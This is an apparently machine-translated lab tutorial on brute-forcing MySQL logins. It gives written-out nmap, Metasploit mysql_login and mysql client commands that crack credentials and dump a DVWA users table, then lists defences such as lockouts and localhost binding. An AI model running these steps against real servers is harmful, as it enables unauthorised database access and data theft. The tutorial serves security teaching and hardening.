6-21 vulnerability exploitation MySQL weak password cracking

mysql Introduce

Mysql Is a relational database management system , The Swedish MySQL AB Companies to develop , At present belongs to the Oracle Its products .Mysql Is one of the most popular relational database management systems , stay WEB Application aspect ,mysql It's the best RDBMS（Relational Database Management System, Relational database management system ） Application software .

Each paragraph is stored in a table , The corresponding combination of multiple tables , Store the corresponding data , Internal key 、 Foreign keys 、 Unique index , Different values , There are corresponding connections , This is the outline of our relational database

Mysql Is a relational database management system , Relational databases keep data in different tables , Instead of storing all the data in a big warehouse , Non relational database ,mydbs、mongdb, Store data in large memory , Instead of storing it in a large table , They have no concept of table , Store in table , Is to improve the speed of search , And it has more flexibility

We can do it in mysql Official website , see mysql Information about ：https://www.mysql.com/

Target detection mysql

Use nmap -sV -p 3306 IP Address , Default mysql Is running on the 3306 Of , Target detection mysql Version information .

nmap -sV -p 3306 192.168.42.137

msf Crack mysql password

Use msf Under the mysql_login Module cracking mysql Login username and password

msfconsole
use auxiliary/scanner/mysql/mysql_login
show options

set rhosts 192.168.1.105
show options

set user_file /home/kali/Desktop/user.txt
set pass_file /home/kali/Desktop/PASS.txt

show options
run

When we get it mysql After the user name and password , We can log in to mysql client , To view the database , Stored data

Log in to the database to view the data

Use mysql -h IP Address -u root Log in to the database system

 mysql -h 192.168.1.105 -u root
 show databases;

use dvwa;
show tables;
select * from users;

The above is the user name we cracked , Log in to the database , View the data

The reason why we can crack successfully , Because our database user name is too simple , User name used root This user , And the password is empty , Or other simple passwords , Are easy to crack , This is the time , We need to defend against such detection , You need to change the user name and password , The design is complicated , Make it not so easy to crack , And you can design thresholds , When we log in three times by mistake , Will block the corresponding IP, Limit login to ten minutes , In this way, it can't be cracked very quickly , It can't even be cracked , We can modify it mysql Default port ,3306, Design it into other ports , Confuse our detection , meanwhile , We don't allow mysql Outreach , Only through 127.0.0.1 Make local connections , Otherwise, do not connect , Or specify specific IP Address , Connect , Not arbitrary IP Can be connected to mysql On